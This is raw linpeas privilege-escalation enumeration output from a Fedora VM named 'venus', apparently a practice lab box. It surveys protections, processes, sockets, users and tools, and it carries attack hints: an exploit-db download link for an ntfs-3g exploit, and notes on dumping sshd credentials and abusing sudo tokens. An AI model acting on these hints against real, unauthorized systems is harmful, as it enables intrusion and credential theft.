Tags: ubuntu=16.04{ntfs-3g:2015.3.14AR.1-1build1},debian=7.0{ntfs-3g:2012.1.15AR.5-2.1+deb7u2},debian=8.0{ntfs-3g:2014.2.15AR.2-1+deb8u2}
Download URL: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41356.zip
Comments: Distros use own versioning scheme. Manual verification needed. Linux headers must be installed. System must have at least two CPU cores.
╔══════════╣ Protections
═╣ AppArmor enabled? .............. AppArmor Not Found
═╣ AppArmor profile? .............. unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023═╣ is linuxONE? ................... s390x Not Found
═╣ grsecurity present? ............ grsecurity Not Found
═╣ PaX bins present? .............. PaX Not Found
═╣ Execshield enabled? ............ Execshield Not Found
═╣ SELinux enabled? ............... SELinux status: enabled
SELinuxfs mount: /sys/fs/selinux
SELinux root directory: /etc/selinux
Loaded policy name: targeted
Current mode: enforcing
Mode from config file: enforcing
Policy MLS status: enabled
Policy deny_unknown status: allowed
Memory protection checking: actual (secure)
Max kernel policy version: 33
═╣ Seccomp enabled? ............... disabled
═╣ User namespace? ................ enabled
═╣ Cgroup2 enabled? ............... enabled
═╣ Is ASLR enabled? ............... No
═╣ Printer? ....................... No
═╣ Is this a virtual machine? ..... Yes (oracle)
╔═══════════╗
═══════════════════════════════════╣ Container ╠═══════════════════════════════════
╚═══════════╝
╔══════════╣ Container related tools present (if any):
╔══════════╣ Am I Containered?
╔══════════╣ Container details
═╣ Is this a container? ........... No
═╣ Any running containers? ........ No
╔═══════╗
═════════════════════════════════════╣ Cloud ╠═════════════════════════════════════
╚═══════╝
═╣ GCP Virtual Machine? ................. No
═╣ GCP Cloud Funtion? ................... No
═╣ AWS ECS? ............................. No
═╣ AWS EC2? ............................. No
═╣ AWS EC2 Beanstalk? ................... No
═╣ AWS Lambda? .......................... No
═╣ AWS Codebuild? ....................... No
═╣ DO Droplet? .......................... No
═╣ Aliyun ECS? .......................... No
grep: /etc/cloud/cloud.cfg: No such file or directory
═╣ Tencent CVM? .......................... No
═╣ IBM Cloud VM? ........................ No
═╣ Azure VM? ............................ No
═╣ Azure APP? ........................... No
curl: (6) Could not resolve host: metadata.google.internal
╔════════════════════════════════════════════════╗
════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════
╚════════════════════════════════════════════════╝
╔══════════╣ Cleaned processes
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
root 1 0.0 0.7 110048 16136 ? Ss 20:04 0:04 /usr/lib/systemd/systemd --switched-root --system --deserialize 31
root 572 0.0 0.8 54780 16340 ? Ss 20:04 0:00 /usr/lib/systemd/systemd-journald
root 585 0.0 0.6 34288 12424 ? Ss 20:04 0:00 /usr/lib/systemd/systemd-udevd
systemd+ 657 0.1 0.4 17736 8528 ? Ss 20:04 0:20 /usr/lib/systemd/systemd-oomd
└─(Caps) 0x0000000000000022=cap_dac_override,cap_kill
systemd+ 659 0.0 0.9 33756 19052 ? Ss 20:04 0:00 /usr/lib/systemd/systemd-resolved
└─(Caps) 0x0000000000002000=cap_net_raw
root 660 0.0 0.1 99608 2164 ? S<sl 20:04 0:00 /sbin/auditd
root 664 0.0 0.1 8124 3580 ? S< 20:04 0:00 _ /usr/sbin/sedispatch
root 682 0.0 0.5 389660 11040 ? Ssl 20:04 0:00 /usr/sbin/ModemManager
chrony 687 0.0 0.1 85952 3884 ? S 20:04 0:00 /usr/sbin/chronyd
└─(Caps) 0x0000000002000400=cap_net_bind_service,cap_sys_time
root 693 0.0 2.0 135280 40520 ? Ssl 20:04 0:01 /usr/bin/python3 -s /usr/sbin/firewalld --nofork --nopid
root 695 0.0 0.0 3160 1988 ? Ss 20:04 0:00 /usr/sbin/mcelog --daemon[0m --foreground
root 696 0.0 0.4 197624 8948 ? Ssl 20:04 0:00 /usr/sbin/rsyslogd -n
root 697 0.0 0.5 28176 11872 ? Ss 20:04 0:00 /usr/sbin/sssd -i --logger=files
root 749 0.0 0.6 30048 13176 ? S 20:04 0:00 _ /usr/libexec/sssd/sssd_be --domain implicit_files --uid 0 --gid 0 --logger=files
root 763 0.0 1.9 53020 38884 ? S 20:04 0:00 _ /usr/libexec/sssd/sssd_nss --uid 0 --gid 0 --logger=files
root 698 0.0 0.4 17996 8716 ? Ss 20:04 0:00 /usr/lib/systemd/systemd-homed
root 699 0.0 0.7 272888 15200 ? Ssl 20:04 0:00 /usr/sbin/abrtd -d -s
dbus 700 0.0 0.2 9984 4368 ? Ss 20:04 0:00 /usr/bin/dbus-broker-launch --scope system --audit
dbus 714 0.0 0.1 5828 3400 ? S 20:04 0:00 _ dbus-broker --log 4 --controller 9 --machine-id 2650d1dd6c7744ed8c6524d8bd4b8e5b --max-bytes 536870912 --max-fds 4096 --max-matches 131072 --audit
└─(Caps) 0x0000000020000000=cap_audit_write
root 717 0.0 0.9 266424 19840 ? Ssl 20:04 0:00 /usr/sbin/NetworkManager --no-daemon[0m
root 782 0.0 0.5 28140 10940 ? Ss 20:04 0:00 /usr/lib/systemd/systemd-logind
magellan 195817 0.0 0.2 45436 5988 ? S 23:12 0:00 _ sshd: magellan@pts/0
magellan 195818 0.0 0.2 24596 5580 pts/0 Ss 23:12 0:00 _ -bash
magellan 195884 0.8 0.2 13248 5608 pts/0 S+ 23:17 0:00 _ /bin/sh ./linpeas.sh
magellan 199064 0.0 0.1 13248 3784 pts/0 S+ 23:18 0:00 _ /bin/sh ./linpeas.sh
magellan 199068 0.0 0.1 24496 3916 pts/0 R+ 23:18 0:00 | _ ps fauxwww
magellan 199067 0.0 0.1 13248 2452 pts/0 S+ 23:18 0:00 _ /bin/sh ./linpeas.sh
root 790 0.0 0.0 2384 744 ? Ss 20:04 0:00 /usr/bin/venus_messaging
magellan 791 0.0 0.1 6904 3096 ? Ss 20:04 0:00 /bin/bash /usr/bin/venus_monitoring_web.sh
magellan 793 0.0 1.8 45948 36748 ? S 20:04 0:00 _ /usr/bin/python3 /home/magellan/venus_monitor_proj/manage.py runserver 0:8080
magellan 835 12.4 2.3 617376 48036 ? Sl 20:04 24:02 _ /usr/bin/python3 /home/magellan/venus_monitor_proj/manage.py runserver 0:8080
root 797 0.0 0.1 53908 3520 ? Ssl 20:04 0:00 /usr/sbin/gssproxy -D
polkitd 826 0.0 1.2 2604308 24428 ? Ssl 20:04 0:00 /usr/lib/polkit-1/polkitd --no-debug
root 857 0.0 0.1 20976 2836 ? Ss 20:04 0:00 /usr/sbin/atd -f
root 864 0.0 0.2 18024 4104 ? Ss 20:04 0:00 /usr/sbin/crond -n
root 870 0.0 0.0 9632 1720 tty1 Ss+ 20:04 0:00 /sbin/agetty -o -p -- u --noclear --noissue tty1 linux
root 875 0.0 0.7 85848 15888 ? Ss 20:04 0:00 /usr/bin/abrt-dump-journal-core -D -T -f -e
root 876 0.0 0.8 77648 16216 ? Ss 20:04 0:00 /usr/bin/abrt-dump-journal-oops -fxtD
root 877 0.0 0.7 85844 15620 ? Ss 20:04 0:00 /usr/bin/abrt-dump-journal-xorg -fxtD
root 179838 0.0 0.3 17536 7608 ? Ss 21:56 0:00 /usr/lib/systemd/systemd-userdbd
root 195879 0.0 0.3 17868 7620 ? S 23:17 0:00 _ systemd-userwork
root 195882 0.0 0.3 17868 7620 ? S 23:17 0:00 _ systemd-userwork
root 195883 0.0 0.3 17868 7620 ? S 23:17 0:00 _ systemd-userwork
magellan 179843 0.0 0.6 22052 13936 ? Ss 21:56 0:00 /usr/lib/systemd/systemd --user
magellan 179845 0.0 0.2 133596 5608 ? S 21:56 0:00 _ (sd-pam)
magellan 187567 0.0 0.0 159148 1036 ? Ss 22:05 0:00 gpg-agent --homedir /home/magellan/.gnupg --use-standard-socket --daemon[0m
╔══════════╣ Binary processes permissions (non 'root root' and not belonging to current user)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
╔══════════╣ Processes whose PPID belongs to a different user (not root)
╚ You will know if a user can somehow spawn processes as a different user
Proc 657 with ppid 1 is run by user systemd-oom but the ppid user is root
Proc 659 with ppid 1 is run by user systemd-resolve but the ppid user is root
Proc 687 with ppid 1 is run by user chrony but the ppid user is root
Proc 700 with ppid 1 is run by user dbus but the ppid user is root
Proc 791 with ppid 1 is run by user magellan but the ppid user is root
Proc 826 with ppid 1 is run by user polkitd but the ppid user is root
Proc 179843 with ppid 1 is run by user magellan but the ppid user is root
Proc 187567 with ppid 1 is run by user magellan but the ppid user is root
Proc 195817 with ppid 195809 is run by user magellan but the ppid user is root
Proc 199364 with ppid 1 is run by user setroubleshoot but the ppid user is root
╔══════════╣ Files opened by processes belonging to other users
╚ This is usually empty because of the lack of privileges to read other user processes information
COMMAND PID TID TASKCMD USER FD TYPE DEVICE SIZE/OFF NODE NAME
╔══════════╣ Processes with credentials in memory (root req)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-from-process-memory
gdm-password Not Found
gnome-keyring-daemon Not Found
lightdm Not Found
vsftpd Not Found
apache2 Not Found
sshd: process found (dump creds from memory as root)
╔══════════╣ Cron jobs
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs
/usr/bin/crontab
incrontab Not Found
-rw-r--r--. 1 root root 0 Mar 29 2021 /etc/cron.deny
-rw-r--r--. 1 root root 451 Jan 26 2021 /etc/crontab
/etc/cron.d:
total 16
drwxr-xr-x. 2 root root 21 May 19 2021 .
drwxr-xr-x. 102 root root 8192 Jun 1 2021 ..
-rw-r--r--. 1 root root 128 Mar 29 2021 0hourly
/etc/cron.daily:
total 12
drwxr-xr-x. 2 root root 6 Jan 26 2021 .
drwxr-xr-x. 102 root root 8192 Jun 1 2021 ..
/etc/cron.hourly:
total 16
drwxr-xr-x. 2 root root 22 Jan 26 2021 .
drwxr-xr-x. 102 root root 8192 Jun 1 2021 ..
-rwxr-xr-x. 1 root root 610 Mar 29 2021 0anacron
/etc/cron.monthly:
total 12
drwxr-xr-x. 2 root root 6 Jan 26 2021 .
drwxr-xr-x. 102 root root 8192 Jun 1 2021 ..
/etc/cron.weekly:
total 12
drwxr-xr-x. 2 root root 6 Jan 26 2021 .
drwxr-xr-x. 102 root root 8192 Jun 1 2021 ..
/var/spool/anacron:
total 12
drwxr-xr-x. 2 root root 63 May 19 2021 .
drwxr-xr-x. 10 root root 113 May 19 2021 ..
-rw-------. 1 root root 9 May 21 21:31 cron.daily
-rw-------. 1 root root 9 May 20 2021 cron.monthly
-rw-------. 1 root root 9 May 21 21:51 cron.weekly
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
SHELL=/bin/sh
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
RANDOM_DELAY=45
START_HOURS_RANGE=3-22
1 5 cron.daily nice run-parts /etc/cron.daily
7 25 cron.weekly nice run-parts /etc/cron.weekly
@monthly 45 cron.monthly nice run-parts /etc/cron.monthly
╔══════════╣ Systemd PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#systemd-path-relative-paths
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin
╔══════════╣ Analyzing .service files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services
/etc/systemd/system/basic.target.wants/rpmdb-rebuild.service could be executing some relative path
/etc/systemd/system/multi-user.target.wants/abrtd.service could be executing some relative path
/etc/systemd/system/remote-fs.target.wants/iscsi.service could be executing some relative path
/etc/systemd/system/systemd-homed.service.wants/systemd-homed-activate.service could be executing some relative path
/etc/systemd/user/basic.target.wants/systemd-tmpfiles-setup.service could be executing some relative path
You can't write on systemd PATH
╔══════════╣ System timers
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers
NEXT LEFT LAST PASSED UNIT ACTIVATES
Tue 2024-05-21 23:42:58 BST 24min left Tue 2024-05-21 22:06:26 BST 1h 12min ago dnf-makecache.timer dnf-makecache.service
Wed 2024-05-22 00:00:00 BST 41min left Tue 2024-05-21 20:04:43 BST 3h 13min ago logrotate.timer logrotate.service
Wed 2024-05-22 00:00:00 BST 41min left Tue 2024-05-21 20:04:43 BST 3h 13min ago mlocate-updatedb.timer mlocate-updatedb.service
Wed 2024-05-22 00:00:00 BST 41min left Tue 2024-05-21 20:04:43 BST 3h 13min ago unbound-anchor.timer unbound-anchor.service
Wed 2024-05-22 20:19:29 BST 21h left Tue 2024-05-21 20:19:29 BST 2h 59min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
Sun 2024-05-26 01:00:00 BST 4 days left Tue 2024-05-21 20:04:43 BST 3h 13min ago raid-check.timer raid-check.service
Mon 2024-05-27 00:53:59 BST 5 days left Tue 2024-05-21 21:09:57 BST 2h 8min ago fstrim.timer fstrim.service
╔══════════╣ Analyzing .timer files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers
╔══════════╣ Analyzing .socket files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets
/etc/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /run/dbus/system_bus_socket
/usr/lib/systemd/system/dbus.socket is calling this writable listener: /run/dbus/system_bus_socket
/usr/lib/systemd/system/sockets.target.wants/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/usr/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/usr/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/usr/lib/systemd/system/sssd-nss.socket is calling this writable listener: /var/lib/sss/pipes/nss
/usr/lib/systemd/system/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/usr/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/usr/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
╔══════════╣ Unix Sockets Listening
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets
/org/kernel/linux/storage/multipathd
/run/.heim_org.h5l.kcm-socket
└─(Read Write)
/run/abrt/abrt.socket
└─(Read Write)
/run/dbus/system_bus_socket
└─(Read Write)
/run/gssproxy.sock
└─(Read Write)
/run/lvm/lvmpolld.socket
/run/mcelog-client
└─(Read )
/run/pcscd/pcscd.comm
└─(Read Write)
/run/systemd/coredump
/run/systemd/home/notify
└─(Read )
/run/systemd/inaccessible/sock
/run/systemd/io.system.ManagedOOM
└─(Read Write)
/run/systemd/journal/dev-log
└─(Read Write)
/run/systemd/journal/io.systemd.journal
/run/systemd/journal/socket
└─(Read Write)
/run/systemd/journal/stdout
└─(Read Write)
/run/systemd/notify
└─(Read Write)
/run/systemd/private
└─(Read Write)
/run/systemd/resolve/io.systemd.Resolve
└─(Read Write)
/run/systemd/userdb/io.systemd.DynamicUser
└─(Read Write)
/run/systemd/userdb/io.systemd.Home
└─(Read Write)
/run/systemd/userdb/io.systemd.Multiplexer
└─(Read Write)
/run/udev/control
/run/user/1001/bus
└─(Read Write)
/run/user/1001/gnupg/S.gpg-agent
└─(Read Write)
/run/user/1001/gnupg/S.gpg-agent.browser
└─(Read Write)
/run/user/1001/gnupg/S.gpg-agent.extra
└─(Read Write)
/run/user/1001/gnupg/S.gpg-agent.ssh
└─(Read Write)
/run/user/1001/systemd/inaccessible/sock
/run/user/1001/systemd/notify
└─(Read Write)
/run/user/1001/systemd/private
└─(Read Write)
/var/lib/gssproxy/default.sock
└─(Read Write)
/var/lib/sss/pipes/nss
└─(Read Write)
/var/lib/sss/pipes/private/sbus-dp_implicit_files.749
/var/lib/sss/pipes/private/sbus-monitor
/var/run/abrt/abrt.socket
└─(Read Write)
/var/run/mcelog-client
└─(Read )
/var/run/setroubleshoot/setroubleshoot_server
└─(Read Write)
╔══════════╣ D-Bus config files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus
Possible weak user policy found on /etc/dbus-1/system.d/org.fedoraproject.SetroubleshootPrivileged.conf ( <policy user="setroubleshoot">)
Possible weak user policy found on /etc/dbus-1/system.d/org.fedoraproject.Setroubleshootd.conf ( <policy user="setroubleshoot">)
Possible weak user policy found on /etc/dbus-1/system.d/org.freedesktop.PolicyKit1.conf ( <policy user="polkitd">
<policy user="polkitd">)
╔══════════╣ D-Bus Service Objects list
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus
NAME PID PROCESS USER CONNECTION UNIT SESSION DESCRIPTION
:1.0 657 systemd-oomd systemd-oom :1.0 systemd-oomd.service - -
:1.1 659 systemd-resolve systemd-resolve :1.1 systemd-resolved.service - -
:1.10 782 systemd-logind root :1.10 systemd-logind.service - -
:1.11 717 NetworkManager root :1.11 NetworkManager.service - -
:1.118 202710 busctl magellan :1.118 session-4.scope 4 -
:1.13 826 polkitd polkitd :1.13 polkit.service - -
:1.14 699 abrtd root :1.14 abrtd.service - -
:1.2 682 ModemManager root :1.2 ModemManager.service - -
:1.3 698 systemd-homed root :1.3 systemd-homed.service - -
:1.4 693 firewalld root :1.4 firewalld.service - -
:1.40 179843 systemd magellan :1.40 [email protected] - -
:1.44 664 sedispatch root :1.44 auditd.service - -
:1.5 1 systemd root :1.5 init.scope - -
:1.6 700 dbus-broker-lau root :1.6 dbus-broker.service - -
:1.7 717 NetworkManager root :1.7 NetworkManager.service - -
com.redhat.ifcfgrh1 717 NetworkManager root :1.11 NetworkManager.service - -
fi.w1.wpa_supplicant1 - - - (activatable) - - -
net.reactivated.Fprint - - - (activatable) - - -
org.bluez - - - (activatable) - - -
org.fedoraproject.FirewallD1 693 firewalld root :1.4 firewalld.service - -
org.fedoraproject.SetroubleshootFixit - - - (activatable) - - -
org.fedoraproject.SetroubleshootPrivileged - - - (activatable) - - -
org.fedoraproject.Setroubleshootd - - - (activatable) - - -
org.freedesktop.DBus 1 systemd root - init.scope - -
org.freedesktop.ModemManager1 682 ModemManager root :1.2 ModemManager.service - -
org.freedesktop.NetworkManager 717 NetworkManager root :1.7 NetworkManager.service - -
org.freedesktop.PackageKit - - - (activatable) - - -
org.freedesktop.PolicyKit1 826 polkitd polkitd :1.13 polkit.service - -
org.freedesktop.UDisks2 - - - (activatable) - - -
org.freedesktop.home1 698 systemd-homed root :1.3 systemd-homed.service - -
-- UID=0 EUID=0
org.freedesktop.hostname1 - - - (activatable) - - -
org.freedesktop.locale1 - - - (activatable) - - -
org.freedesktop.login1 782 systemd-logind root :1.10 systemd-logind.service - -
org.freedesktop.network1 - - - (activatable) - - -
org.freedesktop.nm_dispatcher - - - (activatable) - - -
org.freedesktop.oom1 657 systemd-oomd systemd-oom :1.0 systemd-oomd.service - -
-- UID=998 EUID=998
org.freedesktop.portable1 - - - (activatable) - - -
org.freedesktop.problems - - - (activatable) - - -
org.freedesktop.problems.daemon[0m 699 abrtd root :1.14 abrtd.service - -
-- UID=0 EUID=0
org.freedesktop.realmd - - - (activatable) - - -
org.freedesktop.reportd - - - (activatable) - - -
org.freedesktop.resolve1 659 systemd-resolve systemd-resolve :1.1 systemd-resolved.service - -
org.freedesktop.systemd1 1 systemd root :1.5 init.scope - -
org.freedesktop.timedate1 - - - (activatable) - - -
org.freedesktop.timesync1 - - - (activatable) - - -
╔═════════════════════╗
══════════════════════════════╣ Network Information ╠══════════════════════════════
╚═════════════════════╝
╔══════════╣ Hostname, hosts and DNS
venus
127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4
::1 localhost localhost.localdomain localhost6 localhost6.localdomain6
nameserver 127.0.0.53
options edns0 trust-ad
search .
╔══════════╣ Interfaces
default 0.0.0.0
loopback 127.0.0.0
link-local 169.254.0.0
enp0s3: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.95.15 netmask 255.255.255.0 broadcast 192.168.95.255
inet6 fe80::a00:27ff:fe18:545e prefixlen 64 scopeid 0x20<link>
ether 08:00:27:18:54:5e txqueuelen 1000 (Ethernet)
RX packets 1994238 bytes 179707443 (171.3 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1576303 bytes 356905125 (340.3 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 10 bytes 560 (560.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 10 bytes 560 (560.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN 835/python3
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:9080 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:5355 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::5355 :::* LISTEN -
╔══════════╣ Can I sniff with tcpdump?
No
╔═══════════════════╗
═══════════════════════════════╣ Users Information ╠═══════════════════════════════
╚═══════════════════╝
╔══════════╣ My user
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users
uid=1001(magellan) gid=1001(magellan) groups=1001(magellan) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
╔══════════╣ Do I have PGP keys?
/usr/bin/gpg
netpgpkeys Not Found
netpgp Not Found
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
╔══════════╣ Checking sudo tokens
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens
ptrace protection is disabled (0), so sudo tokens could be abused
╔══════════╣ Checking Pkexec policy
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2
╔══════════╣ Superusers
root:x:0:0:root:/root:/bin/bash
╔══════════╣ Users with console
magellan:x:1001:1001::/home/magellan:/bin/bash
root:x:0:0:root:/root:/bin/bash
venus:x:1000:1000::/home/venus:/bin/bash
╔══════════╣ All users & groups
uid=0(root) gid=0(root) groups=0(root)
uid=1(bin) gid=1(bin) groups=1(bin)
uid=1000(venus) gid=1000(venus) groups=1000(venus)
uid=1001(magellan) gid=1001(magellan) groups=1001(magellan)
uid=11(operator) gid=0(root) groups=0(root)
uid=12(games) gid=100(users) groups=100(users)
uid=14(ftp) gid=50(ftp) groups=50(ftp)
uid=173(abrt) gid=173(abrt) groups=173(abrt)
uid=192(systemd-network) gid=192(systemd-network) groups=192(systemd-network)
uid=193(systemd-resolve) gid=193(systemd-resolve) groups=193(systemd-resolve)
uid=2(daemon[0m) gid=2(daemon[0m) groups=2(daemon[0m)
uid=29(rpcuser) gid=29(rpcuser) groups=29(rpcuser)
uid=3(adm) gid=4(adm) groups=4(adm)
uid=32(rpc) gid=32(rpc) groups=32(rpc)
uid=4(lp) gid=7(lp) groups=7(lp)
uid=5(sync) gid=0(root) groups=0(root)
uid=59(tss) gid=59(tss) groups=59(tss)
uid=6(shutdown) gid=0(root) groups=0(root)
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
uid=7(halt) gid=0(root) groups=0(root)
uid=72(tcpdump) gid=72(tcpdump) groups=72(tcpdump)
uid=74(sshd) gid=74(sshd) groups=74(sshd)
uid=8(mail) gid=12(mail) groups=12(mail)
uid=81(dbus) gid=81(dbus) groups=81(dbus)
uid=989(chrony) gid=985(chrony) groups=985(chrony)
uid=990(dnsmasq) gid=986(dnsmasq) groups=986(dnsmasq)
uid=991(cockpit-wsinstance) gid=987(cockpit-wsinstance) groups=987(cockpit-wsinstance)
uid=992(cockpit-ws) gid=988(cockpit-ws) groups=988(cockpit-ws)
uid=993(setroubleshoot) gid=989(setroubleshoot) groups=989(setroubleshoot)
uid=994(unbound) gid=990(unbound) groups=990(unbound)
uid=995(clevis) gid=991(clevis) groups=991(clevis),59(tss)
uid=996(polkitd) gid=994(polkitd) groups=994(polkitd)
uid=997(systemd-timesync) gid=995(systemd-timesync) groups=995(systemd-timesync)
uid=998(systemd-oom) gid=996(systemd-oom) groups=996(systemd-oom)
uid=999(systemd-coredump) gid=997(systemd-coredump) groups=997(systemd-coredump)
╔══════════╣ Login now
23:19:01 up 3:14, 1 user, load average: 3.04, 0.98, 0.39
USER TTY LOGIN@ IDLE JCPU PCPU WHAT
magellan pts/0 23:12 1:32 0.72s 0.00s w
╔══════════╣ Last logons
magellan pts/0 Tue May 21 23:12:23 2024 still logged in 192.168.95.3
magellan pts/0 Tue May 21 23:10:26 2024 - Tue May 21 23:12:10 2024 (00:01) 192.168.95.3
magellan pts/0 Tue May 21 21:56:59 2024 - Tue May 21 22:47:11 2024 (00:50) 192.168.95.3
reboot system boot Tue May 21 20:04:26 2024 still running 0.0.0.0
root tty1 Thu Jun 3 16:05:35 2021 - crash (1083+03:58) 0.0.0.0
wtmp begins Thu Jan 1 01:00:00 1970
╔══════════╣ Last time logon each user
Username Port From Latest
magellan pts/0 192.168.95.3 Tue May 21 23:12:23 +0100 2024
╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I don't do it in FAST mode...)
╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!
╔══════════════════════╗
═════════════════════════════╣ Software Information ╠═════════════════════════════
╚══════════════════════╝
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/curl
/usr/bin/gcc
/usr/bin/make
/usr/bin/nc
/usr/bin/ncat
/usr/bin/ping
/usr/bin/python
/usr/bin/python3
/usr/bin/sudo
/usr/bin/wget
╔══════════╣ Installed Compilers
gcc.x86_64 11.1.1-1.fc34 @updates
/usr/bin/gcc
╔══════════╣ Analyzing Rsync Files (limit 70)
-rw-r--r--. 1 root root 458 Jan 30 2021 /etc/rsyncd.conf
╔══════════╣ Analyzing Wifi Connections Files (limit 70)
drwxr-xr-x. 2 root root 33 May 19 2021 /etc/NetworkManager/system-connections
drwxr-xr-x. 2 root root 33 May 19 2021 /etc/NetworkManager/system-connections
-rw-------. 1 root root 289 May 19 2021 /etc/NetworkManager/system-connections/enp0s3.nmconnection
╔══════════╣ Analyzing VNC Files (limit 70)
-rw-r--r--. 1 root root 475 Jan 26 2021 /usr/lib/firewalld/services/vnc-server.xml
<?xml version="1.0" encoding="utf-8"?>
<service>
<short>Virtual Network Computing Server (VNC)</short>
<description>A VNC server provides an external accessible X session. Enable this option if you plan to provide a VNC server with direct access. The access will be possible for displays :0 to :3. If you plan to provide access with SSH, do not open this option and use the via option of the VNC viewer.</description>
<port protocol="tcp" port="5900-5903"/>
</service>
╔══════════╣ Searching ssl/ssh files
╔══════════╣ Analyzing SSH Files (limit 70)
-rw-r--r--. 1 root root 162 May 19 2021 /etc/ssh/ssh_host_ecdsa_key.pub
-rw-r--r--. 1 root root 82 May 19 2021 /etc/ssh/ssh_host_ed25519_key.pub
-rw-r--r--. 1 root root 554 May 19 2021 /etc/ssh/ssh_host_rsa_key.pub
══╣ Some certificates were found (out limited):
/etc/cockpit/ws-certs.d/0-self-signed-ca.pem
/etc/pki/ca-trust/extracted/pem/objsign-ca-bundle.pem
/etc/pki/ca-trust/source/ca-bundle.legacy.crt
195884PSTORAGE_CERTSBIN
Searching inside /etc/ssh/ssh_config for interesting info
Include /etc/ssh/ssh_config.d/*.conf
╔══════════╣ Analyzing PAM Auth Files (limit 70)
drwxr-xr-x. 2 root root 4096 May 31 2021 /etc/pam.d
-rw-r--r--. 1 root root 727 Mar 9 2021 /etc/pam.d/sshd
auth substack password-auth
auth include postlogin
account required pam_sepermit.so
account required pam_nologin.so
account include password-auth
password include password-auth
session required pam_selinux.so close
session required pam_loginuid.so
session required pam_selinux.so open env_params
session required pam_namespace.so
session optional pam_keyinit.so force revoke
session optional pam_motd.so
session include password-auth
session include postlogin
╔══════════╣ Analyzing NFS Exports Files (limit 70)
Connected NFS Mounts:
sunrpc /var/lib/nfs/rpc_pipefs rpc_pipefs rw,relatime 0 0
-rw-r--r--. 1 root root 0 Jun 23 2020 /etc/exports
╔══════════╣ Searching kerberos conf files and tickets
╚ http://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-active-directory
ptrace protection is disabled (0), you might find tickets inside processes memory
-rw-r--r--. 1 root root 880 May 20 2021 /etc/krb5.conf
# To opt out of the system crypto-policies configuration of krb5, remove the
# symlink at /etc/krb5.conf.d/crypto-policies which will not be recreated.
includedir /etc/krb5.conf.d/
[logging]
default = FILE:/var/log/krb5libs.log
kdc = FILE:/var/log/krb5kdc.log
admin_server = FILE:/var/log/kadmind.log
[libdefaults]
dns_lookup_realm = false
ticket_lifetime = 24h
renew_lifetime = 7d
forwardable = true
rdns = false
pkinit_anchors = FILE:/etc/pki/tls/certs/ca-bundle.crt
spake_preauth_groups = edwards25519
dns_canonicalize_hostname = fallback
qualify_shortname = ""
# default_realm = EXAMPLE.COM
default_ccache_name = KEYRING:persistent:%{uid}
[realms]
# EXAMPLE.COM = {
# kdc = kerberos.example.com
# admin_server = kerberos.example.com
# }
[domain_realm]
# .example.com = EXAMPLE.COM
# example.com = EXAMPLE.COM
-rw-r--r--. 1 root root 189 May 10 2021 /usr/lib64/sssd/conf/sssd.conf
[sssd]
services = nss, pam
domains = shadowutils
[nss]
[pam]
[domain/shadowutils]
id_provider = files
auth_provider = proxy
proxy_pam_target = sssd-shadowutils
proxy_fast_alias = True
tickets kerberos Not Found
klist Not Found
╔══════════╣ Searching uncommon passwd files (splunk)
passwd file: /etc/pam.d/passwd
passwd file: /etc/passwd
